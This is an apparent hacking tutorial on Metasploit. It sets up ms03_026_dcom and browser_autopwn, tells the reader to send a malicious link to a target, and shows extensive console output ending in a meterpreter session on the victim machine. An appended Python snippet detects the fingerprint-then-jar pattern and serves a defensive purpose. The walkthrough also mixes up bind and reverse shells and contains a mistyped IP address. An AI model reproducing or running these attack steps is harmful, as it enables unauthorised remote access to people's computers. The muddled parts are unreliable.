BindTCP


Every machine with an Ethernet card has more than one address at the same time, for example the loopback address 127.0.0.1 and a LAN address such as 192.168.XX.XX.
Each address is paired with a port that the program chooses when it sets up its socket; this process is called BINDING.
What we are going to do is create a malicious (poisoned) web page over BindTCP for the target machine, and use it to gain access to our target.

[LET'S MAKE IT WORK]

#1) Open a terminal & type:
assault@hackbook:~$ sudo msfconsole
*Inside the msf console, type:*
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
*The output will be: PAYLOAD => windows/meterpreter/bind_tcp*

*Now, Set The Remote Host – target's local IP address*
msf exploit(ms03_026_dcom) > set RHOST 192.168.50.7
*The output will be: RHOST => 192.168.50.7*

*Now, Set The Remote Port*
msf exploit(ms03_026_dcom) > set RPORT 445
RPORT => 445
msf exploit(ms03_026_dcom) > use auxiliary/server/browser_autopwn

*Now, Set The Local Host – hacker's local IP address*
msf auxiliary(browser_autopwn) > set LHOST 192.168.50.15
*The output will be: LHOST => 192.168.50.15*
msf auxiliary(browser_autopwn) > show options
*Here we get the full details of our exploit setup*

Now, let's make it work. Let's type:
msf auxiliary(browser_autopwn) > exploit

*You should get output like this – for example*

[*] Auxiliary module execution completed

[*] Setup
msf auxiliary(browser_autopwn) >

[*] Starting exploit modules on host 192.168.50.15...
[*]

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/ZbZWGnsSdkY
[*] Local IP: http://192.168.50.15:8080/ZbZWGnsSdkY
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/YNqINicHZU
[*] Local IP: http://192.168.50.15:8080/YNqINicHZU
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/BFETWicBTO
[*] Local IP: http://192.168.50.15:8080/BFETWicBTO
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/KNJYWLbvmTrv
[*] Local IP: http://192.168.50.15:8080/KNJYWLbvmTrv
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/zJgyfwaHfknsm
[*] Local IP: http://192.168.50.15:8080/zJgyfwaHfknsm
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/PSDNqAbbY
[*] Local IP: http://192.168.50.15:8080/PSDNqAbbY
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/WqlhgoA
[*] Local IP: http://192.168.50.15:8080/WqlhgoA
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/acsD
[*] Local IP: http://192.168.50.15:8080/acsD
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/VBDrsmM
[*] Local IP: http://192.168.50.15:8080/VBDrsmM
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/vtGCawPJrdo
[*] Local IP: http://192.168.50.15:8080/vtGCawPJrdo
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/wKHV
[*] Local IP: http://192.168.50.15:8080/wKHV
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/bFPtvbKM
[*] Local IP: http://192.168.50.15:8080/bFPtvbKM
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/LYRboZdA
[*] Local IP: http://192.168.50.15:8080/LYRboZdA
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/hhYQMY
[*] Local IP: http://192.168.50.15:8080/hhYQMY
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/hryyaDJULHHFS
[*] Local IP: http://192.168.50.15:8080/hryyaDJULHHFS
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/QsQcOD
[*] Local IP: http://192.168.50.15:8080/QsQcOD
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/eBnHCxf
[*] Local IP: http://192.168.50.15:8080/eBnHCxf
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/nYNGQOiV
[*] Local IP: http://192.168.50.15:8080/nYNGQOiV
[*] Server started.
[*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/ggHgaVluKyvgg
[*] Local IP: http://192.168.50.15:8080/ggHgaVluKyvgg
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/vlctiYnh
[*] Local IP: http://192.168.50.15:8080/vlctiYnh
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 192.168.50.15:3333
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 192.168.50.15:6666
[*] Started reverse TCP handler on 192.168.50.15:7777
[*] Starting the payload handler...
[*] Starting the payload handler...

[*] --- Done, found 20 exploit modules

[*] Using URL: http://0.0.0.0:8080/77SCMnomzkPP
[*] Local IP: http://192.168.50.15:8080/77SCMnomzkPP
[*] Server started.

 

*At this point, you need to send this link to your target: http://192.168.50.15:8080/77SCMnomzkPP. MSF is now waiting for the target to respond. Once the target hits the link, we will get this output – for example*

[*] Handling '/77SCMnomzkPP'
[*] Handling '/77SCMnomzkPP?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDplbi1VUzp4ODY6TVNJRTo5LjA6'
[*] JavaScript Report: Windows 7:undefined:undefined:undefined:undefined:en-US:x86:MSIE:9.0:
[*] Reporting: {"os.product"=>"Windows 7", "os.language"=>"en-US", "os.arch"=>"x86", "os.certainty"=>"0.7"}
[*] Responding with 11 exploits
[*] Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] Generated jar to drop (5125 bytes).
[*] handling request for /mKUpayw
[*] Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] Generated jar to drop (5125 bytes).
[*] handling request for /mKUpayw/
[*] Sending jar
[*] Sending jar
[*] handling request for /mKUpayw
[*] handling request for /FtyKaG
[*] Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] Generated jar to drop (5125 bytes).
[*] handling request for /mKUpayw/
[*] handling request for /FtyKaG/
[*] Sending jar
[*] Sending jar
[*] handling request for /mKUpayw
[*] handling request for /FtyKaG
[*] handling request for /mKUpayw/
[*] Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] Generated jar to drop (5125 bytes).
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] handling request for /mKUpayw/sBDZqkOz.jar
[*] handling request for /FtyKaG/
[*] handling request for /mKUpayw/sBDZqkOz.jar
[*] Sending jar
[*] Sending jar
[*] Sending Applet.jar
[*] Sending Applet.jar
[*] handling request for /mKUpayw
[*] handling request for /FtyKaG
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] handling request for /mKUpayw/
[*] Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] Generated jar to drop (5125 bytes).
[*] Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] Generated jar to drop (5125 bytes).
[*] handling request for /FtyKaG/
[*] handling request for /mKUpayw/hqnUPATq.jar
[*] Sending jar
[*] handling request for /mKUpayw/hqnUPATq.jar
[*] Sending jar
[*] Sending jar
[*] Sending jar
[*] handling request for /mKUpayw
[*] handling request for /FtyKaG
[*] Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] Generated jar to drop (5125 bytes).
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] handling request for /mKUpayw/
[*] Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] Generated jar to drop (5125 bytes).
[*] handling request for /qWELgVkaZEEul
[*] handling request for /FtyKaG/
[*] handling request for /qWELgVkaZEEul/
[*] Sending jar
[*] Sending jar
[*] handling request for /mKUpayw/ZDkGSVKJ.jar
[*] handling request for /mKUpayw/ZDkGSVKJ.jar
[*] Sending jar
[*] Sending jar
[*] handling request for /qWELgVkaZEEul/gCTAlyO.jar
[*] handling request for /qWELgVkaZEEul/gCTAlyO.jar
[*] handling request for /FtyKaG
[*] handling request for /mKUpayw
[*] handling request for /qWELgVkaZEEul
[*] Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] Generated jar to drop (5125 bytes).
[*] handling request for /mKUpayw/
[*] handling request for /qWELgVkaZEEul/
[*] Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] Generated jar to drop (5125 bytes).
[*] handling request for /FtyKaG/
[*] Sending jar
[*] handling request for /mKUpayw/QsIroyrm.jar
[*] Sending jar
[*] handling request for /mKUpayw/QsIroyrm.jar
[*] handling request for /qWELgVkaZEEul/qlMnm.jar
[*] handling request for /qWELgVkaZEEul/qlMnm.jar
[*] Sending jar
[*] Sending jar
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Meterpreter session 1 opened (192.16.50.15:7777 -> 192.168.50.7:1552) at 22-22-22-22 00:00:00 +0200
[*] Sending stage (45744 bytes) to 192.168.50.7
[*] Session ID 5 (192.168.50.15:3333 -> 192.168.50.7:1545) processing InitiakAut
[*] Current server process : GIUfsedggbfgrvFHRdjdss.exe (6108)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3116
[+] Successfully migrated to process
*Now, press Enter to terminate the process & you will get this output*
Interrupt: use the 'exit' command to quit
*Type*
msf auxiliary(browser_autopwn) > sessions
*And you should get this output*

Active sessions
===============

Id  Type                 Information         Connection
--  ----                 -----------         ----------
1   Meterpret java/java  yesigotyou @ kenny  192.168.50.15:7777 -> 192.168.50.7:1536 (192.168.50.7)

*Type*
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
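
Added example (not part of the original walkthrough and not Metasploit code): a defender's check for the pattern visible in the output above, where the browser sends its fingerprint back as a base64 sessid parameter and then fetches .jar files from the same server. The log tuples are constructed from the URLs on this page; the function names and the correlation rule are assumptions for illustration.

```python
import base64
from urllib.parse import urlsplit, parse_qs

# Constructed proxy-log sample as (client, URL); URLs reuse the paths and the
# sessid value from the console output on this page. The last row is benign.
SESSID = ("V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDpl"
          "bi1VUzp4ODY6TVNJRTo5LjA6")
SAMPLE_LOG = [
    ("192.168.50.7", "http://192.168.50.15:8080/77SCMnomzkPP"),
    ("192.168.50.7", "http://192.168.50.15:8080/77SCMnomzkPP?sessid=" + SESSID),
    ("192.168.50.7", "http://192.168.50.15:8080/mKUpayw/sBDZqkOz.jar"),
    ("192.168.50.7", "http://192.168.50.15:8080/qWELgVkaZEEul/gCTAlyO.jar"),
    ("192.168.50.9", "http://intranet.example/report?sessid=abc123"),
]

def decode_fingerprint(value):
    """Return the colon-separated fields of a base64 browser report, else None."""
    value = value.replace(" ", "+")  # parse_qs turns '+' into a space
    try:
        text = base64.b64decode(value + "=" * (-len(value) % 4), validate=True).decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    fields = text.split(":")
    # The report shown on this page has nine fields and a trailing colon.
    return fields if len(fields) >= 9 and text.isprintable() else None

def find_fingerprint_then_jar(log):
    """Flag (client, server) pairs that send a fingerprint and then pull .jar files."""
    profiled, hits = {}, {}
    for client, url in log:
        parts = urlsplit(url)
        key = (client, parts.netloc)
        for value in parse_qs(parts.query).get("sessid", []):
            fields = decode_fingerprint(value)
            if fields:
                profiled[key] = fields
        if key in profiled and parts.path.lower().endswith(".jar"):
            hit = hits.setdefault(key, {"fingerprint": profiled[key], "jars": []})
            hit["jars"].append(parts.path)
    return hits

if __name__ == "__main__":
    for (client, server), hit in find_fingerprint_then_jar(SAMPLE_LOG).items():
        os_name, browser = hit["fingerprint"][0], hit["fingerprint"][7]
        print(f"{client} -> {server}: reported {os_name}/{browser}, "
              f"then fetched {len(hit['jars'])} jar(s): {hit['jars']}")
```

On real proxy logs, feed the rows in time order; the benign sessid in the last sample row is ignored because it does not decode to a colon-separated report.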

 

ENJOY! 🙂

 

 

Here is an example by Gamer Forever